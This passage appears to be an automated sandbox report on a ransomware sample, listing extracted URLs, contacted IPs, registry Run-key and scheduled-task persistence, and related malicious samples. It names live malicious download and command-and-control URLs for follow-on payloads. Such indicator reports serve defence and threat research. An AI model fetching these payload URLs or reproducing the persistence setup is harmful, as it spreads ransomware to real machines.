                  https://api.2ip.ua/geo.jsonRoBDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonOfX:DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ddos.dnsnb8.net:799/cj//k1.rarsHhVfIB.exe, 00000001.00000003.1304081456.0000000000E1B000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
                  http://schemas.microsoftpDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=trueDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008D5000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.amazon.com/DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2402102192.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/3cDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.1322050584.0000000000899000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.json.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://deff.nelreports.net/api/report?cat=msnV0100004.log.12.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05V0100004.log.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.twitter.com/DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403535836.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.json$DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsony_:DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://dc.services.visualstudio.com/v2/trackwctDE6E.tmp.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://we.tl/t-0S984cQ4B3DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.0000000000868000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.0000000000902000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.000000000091C000.00000004.00000020.00020000.00000000.sdmp, _readme.txt.12.dr, _readme.txt3.12.dr, _readme.txt0.12.drtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://zerit.top/dl/build2.exewDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.openssl.org/support/faq.htmlDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.2ip.ua/M8DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://api.2ip.ua/geo.jsonvrDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.1322050584.00000000008D5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonyDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonNr?6DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.1322050584.00000000008D5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.json(x86)JDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/files/1/build3.exe$runOmDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008D5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.reddit.com/DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403334130.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://M365CDN.nel.measure.office-92V0100004.log.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200vDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://api.2ip.ua/geo.jsonrsDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200xDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://api.2ip.ua/geo.jsonp2DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/files/1/build3.exe$runDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.office.com/V0100004.log.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.json6RDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.0000000000868000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.nytimes.com/DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403160510.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509191972.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ocsp.digiV0100004.log.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/files/1/build3.exeDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonPDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000003.1355371317.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000003.1355780671.00000000008E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.wctDE6E.tmp.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEHhVfIB.exe, 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmp, HhVfIB.exe, 00000001.00000003.1251210820.0000000000D60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonnDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://we.tl/t-0S984cQ4:pDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.000000000090D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonjDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1508299132.0000000000639000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509191972.0000000000639000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1507924005.0000000000639000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ddos.dnsnb8.net:799/cj//k1.rarHHhVfIB.exe, 00000001.00000002.1503916634.0000000000DBD000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
                  https://we.tl/t-0S984cQ4DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2519723888.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.000000000090D000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58V0100004.log.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/9cDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.1322050584.0000000000899000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.cowctDE6E.tmp.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonpmDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonesWDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://zerit.top/dl/build2.exe$runDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008D5000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/u8DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ddos.dnsnb8.net:799/cj//k1.rarPUHhVfIB.exe, 00000001.00000002.1503916634.0000000000D8E000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
                  https://api.2ip.ua/geo.json4DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000727000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1508299132.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1507924005.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509191972.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.json7DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/3C8DAB0A318E3BBE55D6418C454BF200NDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.youtube.com/DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403720773.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonat5DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ddos.dnsnb8.net:799/cj//k1.rarpHhVfIB.exe, 00000001.00000002.1504589616.0000000002A1A000.00000004.00000010.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
                  http://fuyt.org/files/1/build3.exe$runrueDmDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008D5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.wikipedia.com/DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403602939.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF2005DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://api.2ip.ua/geo.jsonIDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.live.com/DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2402993020.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonHMDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ddos.dnsnb8.net:799/cj//k1.rarfHhVfIB.exe, 00000001.00000002.1503916634.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, HhVfIB.exe, 00000001.00000003.1304081456.0000000000E06000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
                  http://fuyt.org/test1/get.phppDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.2ip.ua/geo.jsonADE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.google.com/DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2402793637.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  188.114.97.3
                  		api.2ip.uaEuropean Union
                  		13335CLOUDFLARENETUSfalse
                  44.221.84.105
                  		ddos.dnsnb8.netUnited States
                  		14618AMAZON-AESUSfalse
                  92.246.89.93
                  		fuyt.orgRussian Federation
                  		49558LIVECOMM-ASRespublikanskayastr3k6RUtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1482678
                  Start date and time:2024-07-26 02:07:20 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 17s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:35
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Detection:MAL
                  Classification:mal100.rans.spre.troj.evad.winEXE@25/977@6/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 46
                  • Number of non-executed functions: 242
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 104.208.16.94
                  • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Report size getting too big, too many NtWriteFile calls found.
                  • VT rate limit hit for: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  02:08:18Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe s>--Task
                  02:08:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
                  02:08:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
                  21:35:57API Interceptor1x Sleep call for process: WerFault.exe modified
                  21:37:25API Interceptor1x Sleep call for process: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.114.97.3Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                  • downloaddining2.com/h9fmdW6/index.php
                  Quotation.exeGet hashmaliciousFormBookBrowse
                  • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
                  LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                  • www.whatareyoucraving.com/drbb/
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/pqv2p
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/pqv2p
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/pqv2p
                  PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/vMCQY
                  LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                  • cccc.yiuyiu.xyz/config.ini
                  irlsever.docGet hashmaliciousFormBookBrowse
                  • www.ninunveiled.shop/y2xs/
                  Scan copy.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/3VC

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  fuyt.orgE9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                  • 92.246.89.93
                  FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  E1BE354A31A340C3EBE7BF14ED0FBBCB788A47190B253D05067E9E8698C25698.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  D932DBE6A5BE50D4668037CD66420FC424DE0B57368ED6FC8A1D249F4D6D1E10.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                  • 92.246.89.93
                  DA0E4FADC9227BEC63E5BFD562EEFE9682C2131E4DFB8BA2A1A0ECA7C699BB99.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
